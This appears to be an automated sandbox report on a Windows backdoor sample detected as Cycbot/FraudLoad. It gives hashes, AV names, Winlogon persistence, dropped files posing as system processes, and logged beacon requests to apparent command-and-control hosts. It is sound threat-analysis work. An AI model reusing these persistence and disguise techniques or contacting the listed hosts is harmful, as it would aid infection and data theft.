Analysis Date: 2014-08-03 13:14:56
MD5: e831250e5fb166b4b8e2c8d8ac55344d
SHA1: 83bbb0fab00f10db762c7c433ee4645d5b0788d1

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 5c72f0467756d07409ab0bedd28d9715 sha1: ef2387bf745a917af033b273a8ecff3957d1bd40 size: 109056
Section .rdata: md5: 510c3df94d4ffc243b60a93c0077d056 sha1: 4d233115434e9cb2343bc4b9fa4ecef2adeb8e82 size: 512
Section .data: md5: 581c1ce1e58ac6acaec9bd8a2184dbae sha1: 4b2a6dbcffe2235f9737dcc1c6a610527b1c2fa9 size: 22528
Section .rsrc: md5: 0a879b08cb2ef397db99d6f48ea30cc8 sha1: 4a02f20e9d792e8037cecb8d33903175e8acfc92 size: 1024
Timestamp: 2005-10-13 03:29:30
Version: PrivateBuild: 1394
PEhash: 32147b317686e3a10e6eaace412824ef8ce91b6b
IMPhash: b0ed3222f9dbbd27e050796bc2323500
AV 360 Safe: Gen:Heur.FKP.6
AV Ad-Aware: Gen:Heur.FKP.6
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Downloader.Fraudload.Hhn
AV Authentium: W32/Goolbot.C.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Fraudload-1183
AV Emsisoft: Gen:Heur.FKP.6
AV Eset (nod32): Win32/Kryptik.IVO
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.C.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Gen:Heur.FKP.6
AV Grisoft (avg): Cryptic.BNC
AV Ikarus: Packed.Win32.Krap
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan-Downloader.Win32.FraudLoad.hhn
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.e
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.FKP.6
AV Norman: winpe/Cycbot.AW
AV Rising: no_virus
AV Sophos: Troj/FakeAV-CDG
AV Symantec: Backdoor.Cycbot!gen2
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): TrojanDownloader.FraudLoad

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: dolbyaudiodevice.com
Winsock DNS: zoneck.com
Winsock DNS: 127.0.0.1
Winsock DNS: blenderartists.org
Winsock DNS: zonejm.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: blenderartists.org
Type: A
162.159.251.137
DNS: blenderartists.org
Type: A
198.41.249.137
DNS: zonejm.com
Type: A
192.241.157.178
DNS: zoneck.com
Type: A
204.93.213.45
DNS: xibudific.cn
Type: A
DNS: dolbyaudiodevice.com
Type: A
HTTP GET: http://blenderartists.org/external/Banners/facebook2.jpg?tq=gJ4WK%2FSUh7TFk0R8oY%2BQtMWTUj26kJH7yZZRK%2B%2FbxWq1SfkIYUBM
User-Agent: gbot/2.3
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP: 192.168.1.1:1032 ➝ 162.159.251.137:80
Flows TCP: 192.168.1.1:1033 ➝ 192.241.157.178:80
Flows TCP: 192.168.1.1:1034 ➝ 204.93.213.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f657874 65726e61 6c2f4261   GET /external/Ba
0x00000010 (00016)   6e6e6572 732f6661 6365626f 6f6b322e   nners/facebook2.
0x00000020 (00032)   6a70673f 74713d67 4a34574b 25324653   jpg?tq=gJ4WK%2FS
0x00000030 (00048)   55683754 466b3052 386f5925 32425174   Uh7TFk0R8oY%2BQt
0x00000040 (00064)   4d575455 6a32366b 4a483779 5a5a524b   MWTUj26kJH7yZZRK
0x00000050 (00080)   25324225 32466278 57713153 666b4959   %2B%2FbxWq1SfkIY
0x00000060 (00096)   55424d20 48545450 2f312e30 0d0a436f   UBM HTTP/1.0..Co
0x00000070 (00112)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000080 (00128)   0a486f73 743a2062 6c656e64 65726172   .Host: blenderar
0x00000090 (00144)   74697374 732e6f72 670d0a41 63636570   tists.org..Accep
0x000000a0 (00160)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000000b0 (00176)   6e743a20 67626f74 2f322e33 0d0a0d0a   nt: gbot/2.3....
0x000000c0 (00192)                                         

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427663 6a304f6a 62777667 53393137   fBvcj0OjbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656a6d2e 636f6d0d   ost: zonejm.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a0d0a 55736572 2d416765   .3......User-Age
0x000000b0 (00176)   6e743a20 67626f74 2f322e33 0d0a0d0a   nt: gbot/2.3....
0x000000c0 (00192)                                         

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427663 6a304f6a 62777667 53393137   fBvcj0OjbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 65636b2e 636f6d0d   ost: zoneck.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a0d0a 55736572 2d416765   .3......User-Age
0x000000b0 (00176)   6e743a20 67626f74 2f322e33 0d0a0d0a   nt: gbot/2.3....
0x000000c0 (00192)                                         
Strings
.

040904b0
1394
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
<\!/\{
'	2R"`(
 "4"t^
5Mz?mS
5ym4\9>/
)7tn7`
7}-w7F
8cH-=a
-8cN!uMp
=8N,%6m
}'9px)u
B=aq+#b|
B-=uzY
@c`.3tB
_c!=c#
cccCx[
cc,,'j
CreateStdAccessibleObject
@.data
'ddH'd
dHcj4H
EnumResourceNamesA
e\sA!U
ExitProcess
F0OFM1c
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
GlobalDeleteAtom
H;,*j=w
Jn\:l-;#
JRichu
Jt~D=TEn|
@*KAq.5
KERNEL32.dll
Kj9L*X
LresultFromObject
mkE>_B
m}mm|E
mzh|Y:
N7*+.@
*NF,'W
N)+mz:
NN(k9_
No-6hU
!nzIG`
oI<}7s
OLEACC.dll
,oo-w)s
$)r;}6o
`.rdata
r;}FpY
~\%_sK
TerminateProcess
TerminateThread
!This program cannot be run in DOS mode.
U-4R'j
UM4[I4
UnhandledExceptionFilter
Voi|);
[vZ?fp
;{wF"+
X(+z4L
;>/?.Y
YO>Kvv*"
YXXSz^5x
Y=\Yu5
z6jw87
Z?o4L3
[~{[Zy